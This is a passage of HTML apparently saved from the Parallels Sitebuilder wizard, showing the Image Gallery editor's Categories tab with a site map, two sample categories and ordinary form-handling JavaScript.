<td class="cancel-area"><table onclick="document.location.href='/Wizard/Edit/Modules/ImageGallery?tab=categories';" style="cursor: pointer; width: 90px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/cancel.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif);" align="center" class="sb-button-cancel">Cancel</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr></table>
</td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('modalForm');
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%">
<tr id="TRHeader"><td COLSPAN="2">
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-top-container"><tr><td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;" class="sb-header-top"><tr>
<td width="100%"><div style="width: 205px; text-align: center;"><img align="middle" style="cursor: pointer;" alt="" border="0" src="/skins/WinXPReloadedCompact/images/def_sb_logo.gif?5.0.0.2009110318" onclick="window.open('http://www.parallels.com', '_new'); return false;"></div></td>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;border-collapse:collapse;"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Start');" style="cursor: pointer;"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_left.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_start_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Design');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_al.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_stop.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">The page no longer exists.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Edit/Modules/ImageGallery/Category/Add&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script type="text/javascript" src="/js/Wizard/panel_toogle.js?5.0.0.2009110318"></script><table border="0" cellpadding="0" cellspacing="0" style="height: 100%;width:100%" align="center"><tr><td style="vertical-align: top; " align="center"><table cellpadding="0" cellspacing="0" border="0" style="height: 100%;width:100%"><tr>
<td valign="top">
<input type="hidden" id="LeftPanelDiv_hidden" value="false"><input type="hidden" id="LeftPanelDiv_show_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=showSiteMap"><input type="hidden" id="LeftPanelDiv_hide_action" value="localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap"><table style="height:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-edit-panel"><tr>
<td><div id="LeftPanelDiv" style="height: 100%; display: block;"><table width="200" cellspacing="8" cellpadding="8" border="0">
<tr valign="top" height="1"><td><b class="sb-text">Site map</b></td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="siteMapTd" valign="top" height="1">
<script src="/js/Wizard/Edit.js?5.0.0.2009110318" language="javascript"></script><script type="text/javascript" language="javascript"><!--
                                           var currentPageId = '1iqsyi3rp1o';
                                           var action = '/Wizard/Edit';
                                           Event.observe(window, 'load', siteMapOnResize);
                                           Event.observe(window, 'resize', siteMapOnResize);
                                           //--></script><table border="0" cellpadding="0" cellspacing="0" width="100%" height="100%" style="table-layout: fixed;"><tr><td valign="top">
<script type="text/javascript" language="javascript" src="/js/pages_tree.js?5.0.0.2009110318"></script><div id="edit" style="white-space: nowrap; overflow-x: hidden; overflow-y: auto; width:100%; height:100%;">
<script type="text/javascript" language="javascript"><!--
                   SbInitTree('edit', 'true', 'true', '', '', 'true', onNodeSelect, null, null, null);
                   var tree = document.getElementById('edit');
                   
               //--></script><div id="q485ez4jvyq" valign="middle">
<img id="q485ez4jvyqState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q485ez4jvyqLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q485ez4jvyqCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q485ez4jvyqIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q485ez4jvyqSpan" style="vertical-align: middle;">Home</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q485ez4jvyq', 'page1.php', 'Simple', '', '', 'visible');
       </script><div id="hwal3pvmvz3" valign="middle">
<img id="hwal3pvmvz3State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="hwal3pvmvz3Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="hwal3pvmvz3Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="hwal3pvmvz3Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="hwal3pvmvz3Span" style="vertical-align: middle;">About Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'hwal3pvmvz3', 'page2.php', 'Simple', '', '', 'visible');
       </script><div id="b1ynn2c224e" valign="middle">
<img id="b1ynn2c224eState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="b1ynn2c224eLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="b1ynn2c224eCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="b1ynn2c224eIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="b1ynn2c224eSpan" style="vertical-align: middle;">My Family</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'b1ynn2c224e', 'page3.php', 'Simple', '', '', 'visible');
       </script><div id="1iqsyi3rp1o" valign="middle">
<img id="1iqsyi3rp1oState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1iqsyi3rp1oLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1iqsyi3rp1oCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1iqsyi3rp1oIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/modules/ImageGallery/images/icon.gif"><span id="1iqsyi3rp1oSpan" style="vertical-align: middle;">Photos</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1iqsyi3rp1o', 'page4.php', 'ImageGallery', 'true', '', 'visible');
       </script><div id="1mhpsivotpo" valign="middle">
<img id="1mhpsivotpoState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1mhpsivotpoLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1mhpsivotpoCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1mhpsivotpoIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="1mhpsivotpoSpan" style="vertical-align: middle;">Resume</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1mhpsivotpo', 'page5.php', 'Simple', '', '', 'visible');
       </script><div id="q05ufw2vwxb" valign="middle">
<img id="q05ufw2vwxbState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q05ufw2vwxbLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q05ufw2vwxbCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q05ufw2vwxbIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q05ufw2vwxbSpan" style="vertical-align: middle;">Favorite Links</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q05ufw2vwxb', 'page6.php', 'Simple', '', '', 'visible');
       </script><div id="pp2btyiv601" valign="middle">
<img id="pp2btyiv601State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="pp2btyiv601Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="pp2btyiv601Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="pp2btyiv601Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="pp2btyiv601Span" style="vertical-align: middle;">Contact Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'pp2btyiv601', 'page7.php', 'Simple', '', '', 'visible');
       </script>
</div>
<script type="text/javascript" language="javascript"><!--
               SbRefreshTree('edit');
           //--></script>
</td></tr></table>
<script type="text/javascript" language="javascript">
                           var knownPagesFileNames = new Array('index');
                           knownPagesFileNames.push('page1');

       registerPageEditView('q485ez4jvyq', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page2');

       registerPageEditView('hwal3pvmvz3', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page3');

       registerPageEditView('b1ynn2c224e', '/Wizard/Edit/Html');
       

       registerPageEditView('1iqsyi3rp1o', '/Wizard/Edit/Modules/ImageGallery');
       knownPagesFileNames.push('page5');

       registerPageEditView('1mhpsivotpo', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page6');

       registerPageEditView('q05ufw2vwxb', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page7');

       registerPageEditView('pp2btyiv601', '/Wizard/Edit/Html');
       </script>
</td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="pageInfoTd" valign="top" height="1">
<script>
           sbNavigationObject.registerOnSubmitFunction(validateForm);
       </script><table height="160px" width="100%" border="0" cellpadding="0" cellspacing="0" style="table-layout: fixed;">
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page title</span><span style="color:Red; width: 10px;">*</span><br><input id="pageTitle" name="pageTitle" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();" value="Photos">
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page file name</span><span style="color:Red; width: 10px;">*</span><br><input id="pageFileName" name="pageFileName" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:140px;" onchange="self.sbApplyChangesObject.registerChange();" value="page4"><span class="sb-text">.php</span>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page keywords</span><br><textarea id="pageKeywords" name="pageKeywords" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page description</span><br><textarea id="pageDescription" name="pageDescription" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td>
<span style="color:Red; padding-right: 5px;">*</span><span class="sb-text">Required fields</span><br>
</td></tr>
<tr><td style="height: 20px;"><img width="100%" height="1" src="/skins/WinXPReloadedCompact/images/line.gif"></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" border="0" class="control-input-title"><tr>
<td class="input-block"><input id="pageShowInNavigation" type="checkbox" name="pageShowInNavigation" onchange="self.sbApplyChangesObject.registerChange();" class="sb-check" checked></td>
<td class="title-block"><label class="name" for="pageShowInNavigation">Show this page in site map</label></td>
</tr></table></td></tr>
<tr><td align="center" style="padding-top: 10px">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       width: 100%" class="" id="plainPageButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="sb-button-disabled" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="plainPageButtonMainText">Remove Design Template</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<input type="hidden" id="isPlainPage" name="isPlainPage" value="0">
</td></tr>
</table>
<input type="hidden" name="currentPageId" id="page" value="1iqsyi3rp1o">
</td></tr>
</table></div></td>
<td style="height: 100%;" class="sb-edit-panel-hidebackground" id="LeftPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleLeftPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="LeftPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/left.gif"><br><img id="LeftPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap">
</div></td>
</tr></table>
</td>
<td valign="top" style="width: 100%; height: 100%">
<div class="sb-edit-modulename">
<img style="border-width:0px;" src="/modules/ImageGallery/images/icon.gif"><span class="sb-page-title" style="padding-left: 9px;">Image Gallery</span>
</div>
<table class="sb-formtable" cellspacing="0" border="0" style="border-collapse:collapse;height: 99%; width: 100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="image_upload"><input type="hidden" name="pageNum" value=""><input type="hidden" name="pageSize" value=""><input type="hidden" name="orderBy" value=""><input type="hidden" name="orderType" value=""><input type="hidden" name="viewAction" id="viewAction" value="/Wizard/Edit"><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="image_management" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="image_management_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="image_management_T">Images</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="image_management_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="categories" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="categories_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="categories_T">Categories</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="categories_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="settings" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="settings_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="settings_T">Settings</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="settings_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:none;" id="image_managementContent"></div>
<div style="display:block;" id="categoriesContent">
<script src="/modules/ImageGallery/js/categories.js?5.0.0.2009110318" type="text/javascript"></script><fieldset>
<legend>Tools</legend>
<div class="fieldset-block"><table cellspacing="0" border="0" style="border-collapse:collapse;"><tr><td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/Category/Add");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/category.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Add New Category</td></tr>
</table></td></tr></table></div>
</fieldset>
<script type="text/javascript" src="/js/list.js?5.0.0.2009110318"></script><script language="javascript">
function pagedListDoSort(tab, orderBy, orderType) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.orderBy.value = orderBy;
   form.orderType.value = orderType;
   form.submit();
}
</script><fieldset>
<legend>Categories</legend>
<div class="fieldset-block">
<div class="list-tool-block"><table cellspacing="0" cellpadding="0" border="0" class="link-button-container"><tr>
<td class="link-button-image-area"><a href="#" onclick="deleteCategories()"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/delete.png"></a></td>
<td class="link-button-text-area"><a href="#" style="color: Black;" onclick="deleteCategories()">Remove Selected</a></td>
</tr></table></div>
<div class="clear"></div>
<table cellpadding="0" cellspacing="0" border="0"><tr>
<td></td>
<td>
<script language="javascript">
function pagedListShowAll(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';

   if (form.filterValue) {
       form.filterValue.selectedIndex = 0;
   }
   form.elements[tab+'searchString'].value='';
   form.submit();
}
function pagedListSearchItems(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';

   form.submit();
}
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/Category/Add';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-search-input-area"><input type="text" size="25" maxlength="255" class="sb-input" name="categoriessearchString"></td>
<td class="list-show-search-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" style="cursor:pointer;" class="link-button-container" onclick="pagedListSearchItems('categories');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/search.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Search</span></td>
</tr></table></td>
<td class="list-show-showall-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" name="ImageButtonShowAll" style="cursor:pointer;" class="link-button-container" onclick="pagedListShowAll('categories');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/showall.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Show All</span></td>
</tr></table></td>
</tr></table>
</td>
</tr></table>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">2..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('categories',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('categories',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('categories',100);">100</a>
</td>
</tr></table>
<div class="scroll-table"><table cellspacing="0" cellpadding="0" border="0" class="list-table">
<tr class="fixed">
<th style="width:1%;"><div><input type="checkbox" name="globalCheck" onclick="setCheckboxStatus(this.checked);" class="check"></div></th>
<th style="width:1%;"><div>P</div></th>
<th><div>Name</div></th>
<th><div>Number of images</div></th>
<th style="width:1%;"><div><span></span></div></th>
<th style="width:1%;"><div><span></span></div></th>
<th style="width:1%;text-align:center;" scope="col"><div>Edit</div></th>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="objectIds[]" class="check" value="1"></td>
<td></td>
<td style="text-align:;">Category1</td>
<td style="text-align:;">0</td>
<td style="width:1%; text-align:center;"></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                           var action    = document.getElementById('viewAction');
                           var form    = document.forms['SB_WizardForm'];
                           form.action = action.value+'/Modules/ImageGallery/Category/Down?id=1';
                       
                           self.sbApplyChangesObject.registerForcedSaving();
                           sbNavigationObject.go();
                       "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/images/sequence-down.gif"></a></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit?id=1');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row-alter">
<td style="width:1%;"><input type="checkbox" name="objectIds[]" class="check" value="2"></td>
<td></td>
<td style="text-align:;">Category2</td>
<td style="text-align:;">0</td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                           var action    = document.getElementById('viewAction');
                           var form    = document.forms['SB_WizardForm'];
                           form.action = action.value+'/Modules/ImageGallery/Category/Up?id=2';
                       
                           self.sbApplyChangesObject.registerForcedSaving();
                           sbNavigationObject.go();
                       "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/images/sequence-up.gif"></a></td>
<td style="width:1%; text-align:center;"></td>
<td style="width:1%; text-align:center;"><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Category/Edit?id=2');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
</table></div>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">2..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('categories',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('categories',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('categories',100);">100</a>
</td>
</tr></table>
<script type="text/javascript" language="javascript">
                       observeCheckboxesClick('Ids[]',
                           'Top'
                       );
                       observeListRowsHighlight();
                   </script>
</div>
</fieldset>
</div>
<div style="display:none;" id="settingsContent"></div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel = new TabPanel();
           sb_panel.setupAllPages();
       </script>
</td></tr></table>
</td>
</tr></table></td></tr></table>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
